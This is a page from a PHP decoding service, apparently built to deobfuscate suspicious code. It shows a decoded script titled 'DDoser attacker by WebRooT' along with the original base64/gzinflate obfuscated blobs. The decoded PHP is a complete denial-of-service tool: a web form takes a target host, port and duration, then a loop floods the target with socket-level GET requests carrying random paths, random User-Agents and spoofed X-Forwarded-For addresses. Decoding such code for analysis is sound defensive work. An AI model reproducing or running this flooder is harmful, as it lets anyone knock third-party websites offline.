Find this useful? Enter your email to receive occasional updates for securing PHP code.

Signing you up...

Thank you for signing up!

PHP Decode

eval(gzinflate(base64_decode('SyvNSy7JzM9TSEnMKslOMTe0sDTUUCkuKdJUqObl4gQClUQFWwWlmAozIyA2..

Decoded Output download

?><html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta name="author" content="WebRooT" />
<title>DDoser attacker by WebRooT</title>
<style>
body { padding: 3px; }

* {
background-color: #1F1F1F;
color: #0EEF57;
font-family: calibri,tahoma,verdana,terminal,serif,lucida,system;
font-size: 18px;
margin: 0; }

input {
width: 440px;
border: solid 1px #00BCFF;
padding: 2px; }

input.accion {
width: 215px;
border: solid 2px #00BCFF;
padding: 3px;
cursor: pointer }

input:hover , input:active { border-color: #FFE900 }

#dinamico {
padding: 3px;
font-size: 13px!important;
height: 300px;
min-height: 300px;
max-height: 300px;
overflow: hidden }
</style>
</head>
<br>
<center>
<body>
<form action="" method="get" name="jaja">
<table>
<tr>
<td class="titulo">
Hedef/Ip</td> <td><input id="boton" type="text" name="host" value="site.com" size="40px" ></td>
</tr>
<tr>
<td class="titulo">
Dosya Yolu </td> <td> <input id="boton" type="text" name="path" value="/" size="40px" />
</td>
</tr>
<tr>
<td class="titulo">Rastgele Dosya Yolu ret</td><td><input type="checkbox" name="rastgele" /></td>
</tr>
<tr>
<td class="titulo">Yol Belirle</td><td> <input type="text" name="rastgele_yol" value="/?s=*" /></td>
</tr>
<tr>
<td class="titulo">
Port </td>
<td>
<select name="port" id="boton">
<option value="80">80 (HTTP)</option>
<option value="443">443 (HTTPS)</option>
<option value="3128">3128 (proxy)</option>
<option value="8080">8080 (proxy)</option>
<option value="1080">1080 (internal proxies)</option>
<option value="2301">2301 (reverse WWW)</option>
</select></td>
</tr>
<tr>
<td class="titulo">Sre (Saniye)</td><td> <input type="text" name="sure" value="30" /></td>
</tr>
<tr>
<td class="titulo">
Hazr msn? </td> <td>
<input type="submit" value="Saldir!" class="accion"> &nbsp; <input type="button" value="Durdur." class="accion" onclick="window.stop()" /> </td>
</tr>
</table>
</form>
<br />
<div id="dinamico">
<?php
@set_time_limit(0);
ob_start();
if($_GET)
{	
	$host 	  = $_GET['host'] or die("Hedefi belirle");
	$port	  = $_GET['port'] or die("Portu belirle");
	$sure	  = $_GET['sure'] or die("Sreyi belirle");
	$rastgele = $_GET['rastgele'];
	$time 		 = time();	
	$toplam_sure = $time+$sure;
	if(isset($rastgele)){
	$rastgele_yol = $_GET['rastgele_yol'] or die("Rastgele yolu belirle");
	while(1)
	{
		if(time() > $toplam_sure)
		{
			echo "Saldr tamamland";
			break;
		}
		$ddos		  =  ddoser($host,rasgele(25,$rastgele_yol),$port);
	}
	
	}
	else
	{
		$path = $_GET['path'] or die("Yolu belirle");
	
		while(1)
		{
			if(time() > $toplam_sure)
			{
				echo "Saldr tamamland";
				break;
			}
			$ddos		  =  ddoser($host,$path,$port);
		}
	}
	
}
function rasgele($uzunluk,$uzanti=NULL)
{
 $sifre = ""; //ba?lang?? de?eri bo? olarak ayarlan?yor.
 for($i=0;$i<$uzunluk;$i++)
 {
   switch(rand(1,3))
   {
     case 1: $sifre.=chr(rand(48,57));  break; //0-9
     case 2: $sifre.=chr(rand(65,90));  break; //A-Z
     case 3: $sifre.=chr(rand(97,122)); break; //a-z
   }
 }
 $sifre = preg_replace('@\*@si',$sifre,$uzanti);
 //$sifre = $sifre.$uzanti;
 return $sifre;
}
function ddoser($dominio, $ruta, $port) {
    //hago un random de ips para no ser siempre el mismo vistitante
    $ip_simulada = rand(188, 254) . '.' . rand(1, 254) . '.' . rand(1, 254) . '.' . rand(1, 254);
    //defino y abro socket segun los datos del form
	$socket = fsockopen($dominio, $port, $errno, $errstr, 5);
    // comienzan los datos del header para parecer una persona comun xD
    $header.= "GET " . $ruta . " HTTP/1.1
";
    $header.= "Host: " . $dominio."
";
    $header.= "User-Agent: ".rasgele(50,"Mozilla/5.0 (*)")."
";
    $header.= "Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,image/jpg,image/gif,*/*;q=0.5
";
    $header.= "Accept-Language: tr-tr,tr;q=0.8,en-us;q=0.5,en;q=0.3
";
    $header.= "Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
";
    $header.= "Proxy-Connection: keep-alive
";
    $header.= "Referer: http://" . $dominio . $ruta . "
";
    $header.= "Content-Type: application/x-www-form-urlencoded
";
	$header.= "Content-Length: " . mt_rand(100000000, 1000000000);
    $header.= "X-Forwarded-For: " . $ip_simulada . "
";
    $header.= "Cache-Control: no-cache, no-store, max-age=0, must-revalidate
";
    $header.= "Pragma: no-cache
";
    $header.= "Expires: Sun, 01 Jul 1995 00:00:00 GMT
";
    $header.= "Via: CB-Prx
";
    $header.= "Connection: keep-alive

";
    //envio todo lo recolectado
    $send_header = fwrite($socket, $header);
	fclose($socket);
	echo "Saldiri: <span style='color:#FF0F2F'>" . $ip_simulada . "</span> @ " . htmlentities(str_replace('www.', '', $dominio)) . "" . htmlentities($ruta) . "<br />";
	ob_flush();
	flush();
}

?>
</div>
</center>
</body>
</html>

Did this file decode correctly?

Original Code

eval(gzinflate(base64_decode('SyvNSy7JzM9TSEnMKslOMTe0sDTUUCkuKdJUqObl4gQClUQFWwWlmAozIyA2jKkwNwbSpjEVxmZAbBJTYZoG5JtAxMxAcnC+kjXUhCSoCeZA3YlA2hKIU4EYaIJZMtRUFB1FqSWlRXkKKkkaKokQ12hCZGoB')));

eval(gzinflate(base64_decode('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')));

Function Calls

gzinflate 3
dajtkd71891 1
base64_decode 3

Variables

$a base64_decode
$b gzinflate
$str lVjpcttGEv4tVekdOjArJGWAAClxTZEi6VNxtpxdlaWsN7tOqYbAkBgLwCCD..

Stats

MD5 c9ab347488ae289963a897e5d6742115
Eval Count 3
Decode Time 98 ms